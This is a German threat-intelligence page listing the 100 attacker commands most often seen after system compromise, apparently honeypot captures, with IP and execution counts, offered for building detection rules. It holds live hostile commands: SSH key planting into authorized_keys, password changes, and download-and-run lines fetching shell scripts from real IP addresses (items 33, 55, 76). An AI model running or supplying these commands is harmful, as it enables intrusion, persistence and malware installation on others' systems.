TROYANOSYVIRUS
Aktualisiert: Februar 2026

Top 100 bosartige Befehle

Die am haufigsten ausgefuhrten Befehle von Angreifern nach Erlangung des Systemzugangs. Nutzlich fur die Erkennung von Eindringlingen und die Reaktion auf Vorfalle.

5480 Befehle in 24h
1.
$Enter new UNIX password:
132 IPs327x
2.
$lockr -ia .ssh
189 IPs294x
3.
$cd ~; chattr -ia .ssh; lockr -ia .ssh
163 IPs239x
4.
$cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
168 IPs237x
5.
$uname -m
161 IPs234x
6.
$free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
156 IPs229x
7.
$cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
162 IPs225x
8.
$cat /proc/cpuinfo | grep name | wc -l
153 IPs225x
9.
$top
154 IPs223x
10.
$lscpu | grep Model
148 IPs222x
11.
$whoami
153 IPs219x
12.
$w
149 IPs218x
13.
$uname
146 IPs216x
14.
$df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
146 IPs213x
15.
$cat /proc/cpuinfo | grep model | grep name | wc -l
151 IPs212x
16.
$uname -a
148 IPs211x
17.
$which ls
150 IPs210x
18.
$crontab -l
147 IPs209x
19.
$ls -lh $(which ls)
124 IPs165x
20.
$/bin/./uname -s -v -n -r -m
19 IPs134x
21.
$uname -s -v -n -m 2 > /dev/null
53 IPs111x
22.
$export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version
50 IPs92x
23.
$cat /proc/uptime 2 > /dev/null | cut -d. -f1
20 IPs92x
24.
$rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
57 IPs70x
25.
$uname -m 2 > /dev/null
20 IPs45x
26.
$echo hello
3 IPs20x
27.
$/ip cloud print
6 IPs12x
28.
$curl2
1 IPs11x
29.
$cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps
1 IPs11x
30.
$echo "cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps" | sh
1 IPs11x
31.
$uname -s -v -n -r -m
3 IPs10x
32.
$./
1 IPs9x
33.
$cd /data/local/tmp/; busybox wget http://193.26.115.122/w.sh; sh w.sh; curl http://193.26.115.122/c.sh; sh c.sh; wget http://193.26.115.122/wget.sh; sh wget.sh; curl http://193.26.115.122/wget.sh; sh wget.sh; busybox wget http://193.26.115.122/wget.sh; sh wget.sh; busybox curl http://193.26.115.122/wget.sh; sh wget.sh
5 IPs9x
34.
$if [ [ ! -d ${HOME}/.ssh ] ]
3 IPs8x
35.
$nproc
3 IPs8x
36.
$then
3 IPs8x
37.
$ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
6 IPs7x
38.
$cat /proc/cpuinfo
6 IPs7x
39.
$ps -ef | grep '[Mm]iner'
5 IPs6x
40.
$ifconfig
6 IPs6x
41.
$/bin/busybox TEST
1 IPs5x
42.
$cat /proc
1 IPs5x
43.
$ps | grep '[Mm]iner'
5 IPs5x
44.
$locate D877F783D5D3EF8Cs
4 IPs5x
45.
$echo SHELL_TEST
1 IPs5x
46.
$echo Hi | cat -n
4 IPs5x
47.
$User-Agent: python-requests/2.27.1
1 IPs4x
48.
$shell
2 IPs4x
49.
$system
2 IPs4x
50.
$Connection: keep-alive
1 IPs4x
51.
$df
1 IPs4x
52.
$Accept-Encoding: gzip, deflate
1 IPs4x
53.
$q
2 IPs4x
54.
$Accept: */*
1 IPs3x
55.
$cd /tmp||cd /var/run||cd /mnt||cd /root||cd /;wget -q http://176.65.132.222/hjedr7.sh -O .71l2k6pv;sh .71l2k6pv;rm -f .71l2k6pv
2 IPs2x
56.
$Accept-Encoding: gzip
1 IPs2x
57.
$while read i
2 IPs2x
58.
$uname -s -m
2 IPs2x
59.
$rm .s; exit
2 IPs2x
60.
$sh
2 IPs2x
61.
$pm path com.google.home.tv
1 IPs2x
62.
$ps xau
1 IPs2x
63.
$dd bs=52 count=1 if=.s || cat .s || while read i; do echo $i; done < .s
2 IPs2x
64.
$enable
2 IPs2x
65.
$echo "123456\nvvwtvxBKujR6\nvvwtvxBKujR6\n"|passwd
1 IPs1x
66.
$echo "123456\nstXcXmvo0rgj\nstXcXmvo0rgj\n"|passwd
1 IPs1x
67.
$echo "123456\njab6g6TZTf8I\njab6g6TZTf8I\n"|passwd
1 IPs1x
68.
$echo "123456\njRjKPevLXyu0\njRjKPevLXyu0\n"|passwd
1 IPs1x
69.
$cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox LYRSB
1 IPs1x
70.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "NSI1sp8T\nNSI1sp8T" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
71.
$echo "123456\nftXGzF9eIkeG\nftXGzF9eIkeG\n"|passwd
1 IPs1x
72.
$echo "123456\ncowrsiOaYjzk\ncowrsiOaYjzk\n"|passwd
1 IPs1x
73.
$cd /dev/shm; cat .s || cp /bin/echo .s; /bin/busybox CGZFU
1 IPs1x
74.
$echo "123456\naXRg7yROwuOV\naXRg7yROwuOV\n"|passwd
1 IPs1x
75.
$echo "123456\na29ssbX9cpPC\na29ssbX9cpPC\n"|passwd
1 IPs1x
76.
$cd /data/local/tmp/; busybox wget http://94.156.152.217/kla.sh; sh kla.sh; curl http://94.156.152.217/kla.sh; sh kla.sh; wget http://94.156.152.217/kla.sh; sh kla.sh; curl http://94.156.152.217/kla.sh; sh kla.sh; busybox wget http://94.156.152.217/kla.sh; sh kla.sh; busybox curl http://94.156.152.217/kla.sh; sh kla.sh
1 IPs1x
77.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "FvM9dFSx\nFvM9dFSx" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
78.
$echo "123456\nYbuSMnAWcW2f\nYbuSMnAWcW2f\n"|passwd
1 IPs1x
79.
$echo "123456\nYIRjzl9giH4E\nYIRjzl9giH4E\n"|passwd
1 IPs1x
80.
$echo "123456\nUgj7OhPjsDvE\nUgj7OhPjsDvE\n"|passwd
1 IPs1x
81.
$echo "123456\nF90MjL094354\nF90MjL094354\n"|passwd
1 IPs1x
82.
$echo "123456\nDqj4W7tVKHgH\nDqj4W7tVKHgH\n"|passwd
1 IPs1x
83.
$echo "claude123\nssOrmooR7BTd\nssOrmooR7BTd\n"|passwd
1 IPs1x
84.
$echo "123456\nCWEHGol1aVmD\nCWEHGol1aVmD\n"|passwd
1 IPs1x
85.
$echo "123456\n3xq6IiCkBJMh\n3xq6IiCkBJMh\n"|passwd
1 IPs1x
86.
$echo "claude123\nXUNKlsWCRxUs\nXUNKlsWCRxUs\n"|passwd
1 IPs1x
87.
$echo "123456\n2y0gy8oLLUrB\n2y0gy8oLLUrB\n"|passwd
1 IPs1x
88.
$cat /proc/mounts; /bin/busybox LYRSB
1 IPs1x
89.
$cat /proc/mounts; /bin/busybox CGZFU
1 IPs1x
90.
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "CuATsjk8\nCuATsjk8" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk
1 IPs1x
91.
$echo "claude123\nXO2AyL2GRckx\nXO2AyL2GRckx\n"|passwd
1 IPs1x
92.
$echo "claude123\nVQfWq1JtjeE2\nVQfWq1JtjeE2\n"|passwd
1 IPs1x
93.
$echo "123456\n1QXu3NvmkHmx\n1QXu3NvmkHmx\n"|passwd
1 IPs1x
94.
$echo "claude123\nVGoNg0hvW4ce\nVGoNg0hvW4ce\n"|passwd
1 IPs1x
95.
$echo "claude123\nT2CNKc4FU1sM\nT2CNKc4FU1sM\n"|passwd
1 IPs1x
96.
$echo "claude123\nZsLRNCju8HSn\nZsLRNCju8HSn\n"|passwd
1 IPs1x
97.
$echo "claude123\nkahuonWLPnbR\nkahuonWLPnbR\n"|passwd
1 IPs1x
98.
$echo "claude123\nmlARC6tbHmTU\nmlARC6tbHmTU\n"|passwd
1 IPs1x
99.
$echo "123456789\nmlLhc1eieRLN\nmlLhc1eieRLN\n"|passwd
1 IPs1x
100.
$echo "claude123\nRU45aPeHPneK\nRU45aPeHPneK\n"|passwd
1 IPs1x

Aufklarung

uname, whoami, cat /etc/passwd

Download

wget, curl, tftp

Persistenz

crontab, chmod, chattr

Laterale Bewegung

ssh, scp, ping

Erkennungsnutzung

Diese Befehle konnen verwendet werden, um Erkennungsregeln in SIEM, IDS/IPS und Uberwachungssystemen zu erstellen. Uberwachen Sie diese Muster in Ihren Logs, um Eindringlinge zu erkennen.